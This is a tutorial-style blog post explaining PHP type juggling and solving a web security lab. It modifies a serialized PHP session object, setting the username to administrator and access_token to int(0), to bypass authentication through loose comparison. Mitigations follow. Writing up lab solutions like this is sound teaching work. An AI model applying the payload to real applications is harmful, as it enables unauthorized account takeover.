What is Type Juggling:

PHP is known as a dynamically typed language, PHP has a feature called type juggling , In PHP Type juggling means dealing with a variable type. If an integer value is assigned to a variable, it becomes an integer. If a string value is assigned to the variable, it becomes a String.

PHP Has two main comparison modes, loose (==) and strict (===).

PHP type juggling vulnerability occurs when a loose comparison operator (== or!=) is used in the place of a strict comparison operator or instead of it (=== or! ==)

PHP comparison: Strict

strict comparison works like loose comparison, but Neither value is implicitly converted to some other value before being compared. If the values have different types, the values are considered not equal.

as shown in the figure below

None

PHP comparison: Loose

None

In PHP loose comparison will first convert them to a common, comparable type. when comparing string to number PHP will attempt to convert the string to a number then perform a numeric comparison.

for example:

$int = 5
$str = "5"
if ($str == $int) {
echo("TRUE")
}

output:

TRUE

because PHP convert string "5" to integer and compares it with the $int

other examples:

"00" == int(0) — → TRUE

"0abc" == int(0) — → TRUE

"1abc" == int(1) — → TRUE

"abc" == int(0) — → TRUE

The Risk:

1- unauthorized access or authentication bypass

2- data manipulation

SOLVE Lab: Modifying serialized data types

None

First, configure the proxy and access the lab

After logging in to the account and mapping the application, go to the requests in the HTTP history and analyze them.

None

After analyze them, I found nothing interesting in a request body but there is a session cookie

after examining the session and decoding as URL then base64, you will get the serialized PHP object

O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"p3frad2r93cvh95lxw9pavw1m272mzne";}

lets modify our serialized object, change username wiener to administrator and update the length

O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";s:32:"p3frad2r93cvh95lxw9pavw1m272mzne";}
None

then put it in session after encoding and send the request

but unfortunately, internal server Error because access_token

None

So lets modify value of access_token, change the value to int(0) and update data type to int, to take advantage of a possible comparison flaw (PHP loose comparison) , In short to try testing existence PHP comparison :loose

O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}

and because loose comparison, PHP considers the character string to be an integer equal to 0

then encode as base64, then url, and put it in the session and send the request, to Try to test it

And finally, I succeeded in access the administrator account.

None

And after deleting the user carlos , solved the lab

None

Mitigation:

1- Use Strict Comparison instead of using comparison operator == 2- Input Validation and Sanitization 3- Regular Code Review

Thank you for reading.

🔔 Follow me: LinkedIn | Twitter

References:

PHP Type Juggling

In this tutorial, you'll learn about PHP type juggling and how it works.

phptutorial.net

https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf

PHP Type Juggling Vulnerabilities & How to Fix Them | Invicti

This article provides an introduction to PHP Type Juggling Vulnerabilities. It explains how issues in PHP code could…

invicti.com

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md